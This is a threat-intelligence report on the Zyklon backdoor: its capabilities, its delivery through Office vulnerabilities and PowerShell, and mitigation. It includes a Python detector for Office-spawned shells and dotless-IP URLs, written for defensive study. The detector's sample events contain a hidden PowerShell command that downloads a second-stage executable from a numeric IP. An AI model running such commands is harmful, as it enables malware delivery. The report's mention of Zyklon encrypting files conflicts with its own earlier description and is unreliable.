Zyklon Malware

TACTICAL CYBER INTELLIGENCE REPORT

Actor Type: II
Serial: TR-18-025-002
Countries: CN, IN
Report Date: 20180125

Zyklon Malware

Zyklon is a family of malware which first emerged in early 2016 before going dormant until January 2017.  Attackers then exploited several vulnerabilities in the Microsoft Office software suite in order to spread Zyklon malware.[1]

The 2017 Zyklon malware attacks targeted insurance, financial services and telecommunications companies.  Zyklon is a publicly available, full-featured “backdoor,” capable of keylogging, password harvesting, downloading and executing additional plugins, conducting distributed denial-of-service (DDoS) attacks, and self-updating/self-removal.  Zyklon is capable of communicating with its command and control (C2) server over The Onion Router (Tor) network.  The malware can download several plugins, some of which include features like cryptocurrency mining and password recovery through browsers and email software.  Zyklon also gives its operators an efficient mechanism to monitor the malware's spread and its impact.  Users have been exposed to the Zyklon malware primarily through spam emails that include a ZIP file attachment containing a DOC file with code to download and install the malware.

Attack Flow and Impact

Once the Zyklon malware has infected a machine, it can cause extensive damage in a variety of ways.  These include harvesting passwords and other sensitive information via keylogging and data scraping, using the machine's hardware resources for cryptocurrency mining, and enrolling the infected system in a botnet used to launch distributed denial-of-service (DDoS) attacks.

According to a recently published cyber report, the attackers behind the campaign are leveraging the following three vulnerabilities in Microsoft Office; each is used to execute a PowerShell script on the targeted computer, which downloads the final payload from the C2 server:

1) .NET Framework RCE Vulnerability (CVE-2017-8759) — This remote code execution vulnerability exists when the Microsoft .NET Framework processes untrusted input, allowing an attacker to take control of an affected system by tricking the victim into opening a specially crafted malicious document file sent by email.  Microsoft released a security patch for this flaw in its September 2017 updates.

2) Microsoft Office RCE Vulnerability (CVE-2017-11882) — A 17-year-old memory corruption flaw, patched by Microsoft in its November 2017 update, that allows a remote attacker to execute malicious code on the targeted system; no user interaction is required beyond opening the malicious document.

3) Dynamic Data Exchange Protocol (DDE Exploit) — This technique abuses a built-in feature of Microsoft Office, called DDE, to achieve code execution on the targeted device without requiring macros to be enabled and without relying on memory corruption.

DDE is a protocol that establishes how applications send messages and share data through shared memory.  Over the past year, however, attackers have had great success with macro-based malware that abuses DDE to launch droppers, exploits and malware.[2]

As explained by researchers, attackers are actively exploiting these three vulnerabilities to deliver Zyklon malware using spear-phishing emails, which typically arrive with an attached ZIP file containing a malicious Office document.  Once opened, the malicious document, weaponized with one of these vulnerabilities, immediately runs a PowerShell script, which eventually downloads the final payload, Zyklon HTTP malware, onto the infected computer.  The injected code is responsible for downloading the final payload from the server.  The final-stage payload is a PE executable compiled with the .NET Framework.  Interestingly, the PowerShell script connects to a dotless IP address (the 32-bit address written as a single integer rather than in dotted-quad form, example: http://3627732942) to download the final payload.[3]
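The delivery chain above (Office document, spawned PowerShell, download from a dotless IP) gives a defender two cheap telemetry checks: an Office process spawning a shell, and a URL whose host is a bare integer.  The following Python is an added example written for this report, not code from Wapack Labs or from the cited research.  The process names, field names and sample events are assumptions; the sample events are constructed, not real telemetry.  eqnedt32.exe (the Office Equation Editor) is included as a parent because it is the component affected by CVE-2017-11882, a detail the report itself does not spell out.  The decimal host is the report's own example value, and the hex host is that same address in 0x form, shown to illustrate that the decoder handles more than the decimal case.

```python
import ipaddress
import re
from typing import Dict, List, Optional, Tuple

# Assumed process names. The Office hosts are the usual parents for the
# document-based delivery the report describes; eqnedt32.exe is added because
# it is the Equation Editor component affected by CVE-2017-11882.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe",
                  "outlook.exe", "eqnedt32.exe"}
SHELL_CHILDREN = {"powershell.exe", "cmd.exe", "mshta.exe",
                  "wscript.exe", "cscript.exe"}

# Host portion of an http(s) URL (stops at '/', ':', whitespace or quotes).
URL_HOST_RE = re.compile(r"https?://([^/\s:'\"]+)", re.IGNORECASE)


def decode_numeric_host(host: str) -> Optional[str]:
    """Translate a 'dotless' IPv4 host (one integer in decimal, 0x-hex or
    0-octal form) into dotted-quad notation. Returns None when the host is
    not a bare integer or does not fit in 32 bits."""
    try:
        lowered = host.lower()
        if lowered.startswith("0x"):
            value = int(lowered[2:], 16)
        elif lowered.startswith("0") and len(lowered) > 1:
            value = int(lowered[1:], 8)
        elif lowered.isdigit():
            value = int(lowered, 10)
        else:
            return None
    except ValueError:
        return None
    if value > 0xFFFFFFFF:
        return None
    return str(ipaddress.IPv4Address(value))


def triage_event(event: Dict[str, str]) -> List[str]:
    """Return the findings for one process-creation event (assumed fields:
    parent_image, image, command_line)."""
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    child = event["image"].rsplit("\\", 1)[-1].lower()
    findings: List[str] = []
    if parent in OFFICE_PARENTS and child in SHELL_CHILDREN:
        findings.append(f"office-spawned-shell: {parent} -> {child}")
    for host in URL_HOST_RE.findall(event["command_line"]):
        dotted = decode_numeric_host(host)
        if dotted is not None:
            findings.append(f"dotless-ip-url: {host} -> {dotted}")
    return findings


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Run triage over a batch; returns (index, findings) for flagged events."""
    hits = []
    for idx, event in enumerate(events):
        findings = triage_event(event)
        if findings:
            hits.append((idx, findings))
    return hits


# Constructed sample events (not real telemetry). The decimal host is the
# example value quoted in the report; the hex host is the same address in 0x form.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'powershell.exe -w hidden -c "Invoke-WebRequest http://3627732942/stage2 -OutFile $env:TEMP\s.exe"'},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -c Get-Date"},
    {"parent_image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c start http://0xD83ACFCE/"},
]

if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_EVENTS):
        print(f"event {idx}:")
        for finding in findings:
            print("  " + finding)
```

The dotless example from the report, 3627732942, decodes to 216.58.207.206; a proxy or EDR rule that only matches dotted-quad literals in URLs would miss it, which is why the decoder normalizes before any allow-list or reputation lookup.  In practice the parent/child check belongs in a process-creation rule (Sysmon event ID 1 or the equivalent) and the URL check in command-line and proxy-log analysis.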

Mitigation and Prevention Strategies

It is important to keep your software updated.  The best way to protect yourself and your organization from such malware attacks is to be suspicious of any unsolicited document sent by email and never to click on links inside such documents unless the source has been adequately verified.

For Zyklon-infected systems, removal and restoration of files is often a multi-step process, particularly if the computer's files have been encrypted as part of a Zyklon ransomware attack.  Third-party utilities like Recuva, Malwarebytes, and/or SpyHunter are typically needed as part of the Zyklon removal and recovery process.

An essential key to avoiding a Zyklon infection is catching up on, and staying current with, important security patches for Microsoft Office as well as for your operating system and other key software.  Security patches for Microsoft Office that protect against Zyklon are available.

Contact the Wapack Labs for more information: 603-606-1246, or feedback@wapacklabs.com.


[1] https://www.webopedia.com/TERM/Z/zyklon-malware.html

[2] https://threatpost.com/attackers-use-microsoft-office-vulnerabilities-to-spread-zyklon-malware/129503/

[3] https://thehackernews.com/2018/01/microsoft-office-malware.html
